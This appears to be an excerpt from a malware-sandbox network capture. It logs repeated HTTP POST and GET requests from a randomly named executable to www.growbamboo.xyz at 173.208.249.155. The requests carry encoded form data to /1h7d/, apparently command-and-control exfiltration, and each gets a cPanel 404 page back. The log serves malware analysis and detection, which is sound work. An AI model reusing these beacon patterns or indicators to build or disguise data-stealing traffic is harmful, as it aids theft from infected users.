                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:50.045655966 CET | 1236 | IN
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:50.045667887 CET | 1236 | IN
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:50.046139002 CET | 1236 | IN
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:50.046154022 CET | 1236 | IN
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:50.046169996 CET | 1236 | IN
                                                                                  Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                                                                  Dec 12, 2024 00:19:50.046181917 CET | 1236 | IN
                                                                                  Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                                                                  Dec 12, 2024 00:19:50.046696901 CET | 145 | IN
                                                                                  Data Ascii: e> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">
                                                                                  Dec 12, 2024 00:19:50.046706915 CET | 1236 | IN
                                                                                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 25www.growbamboo.xyz's <a href="mailto
                                                                                  Dec 12, 2024 00:19:50.046716928 CET | 456 | IN
                                                                                  Data Ascii: class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_b


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.5 | 49935 | 173.208.249.155 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:51.565583944 CET | 778 | OUT | POST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=Lj90mIgV26FPUx6e3uUkEiv1lJu6idJS34ulnaJIWu1pw8njqGhFDnE44GZRLQZ9V8I+5Gs8owOwNSFVpxTS5GBfxmYQsS1OAH6002cWigEuimbrq8UL1yMjOguwXuNGAXe+JY6LgPK+tUGUMcyU0Dr+GhAYnGqL/v9s570y4CDwzdyJGjblzSWkzjZbEJ+B5Sd2CqKHxGyDs1fFDTxwWMZWms5H
                                                                                  Dec 12, 2024 00:19:52.710707903 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:52 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:52.710783005 CET | 1236 | IN
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:52.710794926 CET | 1236 | IN
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:52.711070061 CET | 1236 | IN
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:52.711081028 CET | 896 | IN
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:52.711090088 CET | 1236 | IN
                                                                                  Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
                                                                                  Dec 12, 2024 00:19:52.711100101 CET | 1236 | IN
                                                                                  Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFl
                                                                                  Dec 12, 2024 00:19:52.711468935 CET | 485 | IN
                                                                                  Data Ascii: bcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; }
                                                                                  Dec 12, 2024 00:19:52.711486101 CET | 1236 | IN
                                                                                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 25www.growbamboo.xyz's <a href="mailto
                                                                                  Dec 12, 2024 00:19:52.711493969 CET | 456 | IN
                                                                                  Data Ascii: class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_b


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.5 | 49941 | 173.208.249.155 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:54.223640919 CET | 1795 | OUT | POST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=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 [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:55.398338079 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:55 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:55.398406982 CET  224  IN  Data Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                                                                  Dec 12, 2024 00:19:55.398417950 CET  1236  IN  Data Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65
                                                                                  Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; }
                                                                                  Dec 12, 2024 00:19:55.398570061 CET  1236  IN  Data Raw: 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b
                                                                                  Data Ascii: reak: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { te
                                                                                  Dec 12, 2024 00:19:55.398581028 CET  1236  IN  Data Raw: 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20
                                                                                  Data Ascii: margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px;
                                                                                  Dec 12, 2024 00:19:55.398802996 CET  1236  IN  Data Raw: 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64
                                                                                  Data Ascii: RFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI
                                                                                  Dec 12, 2024 00:19:55.398821115 CET  1236  IN  Data Raw: 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f
                                                                                  Data Ascii: K0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpC
                                                                                  Dec 12, 2024 00:19:55.398832083 CET  552  IN  Data Raw: 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52
                                                                                  Data Ascii: HvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrsty
                                                                                  Dec 12, 2024 00:19:55.398842096 CET  1236  IN  Data Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                                                                  Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                                                                                  Dec 12, 2024 00:19:55.398852110 CET  1061  IN  Data Raw: 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: ="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  20          192.168.2.5  49951        173.208.249.155  80                5884  C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  Dec 12, 2024 00:19:56.886972904 CET  505  OUT  GET /1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:58.044935942 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:57 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:58.045036077 CET  1236  IN  Data Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:58.045053959 CET  1236  IN  Data Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:58.045278072 CET  1236  IN  Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:58.045295000 CET  1236  IN  Data Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:58.045310974 CET  1236  IN  Data Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                                                                  Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                                                                  Dec 12, 2024 00:19:58.045331001 CET  776  IN  Data Raw: 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63 36 72 5a 6b 41 33 42 70 76 33 6e 6a 66 53 2f 6e 68 52 37 38 31 45 35 34 4e 36 74 34 4f 65 57 78 51 78 75 6b 6e
                                                                                  Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                                                                  Dec 12, 2024 00:19:58.045689106 CET  1236  IN  Data Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                                                                  Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
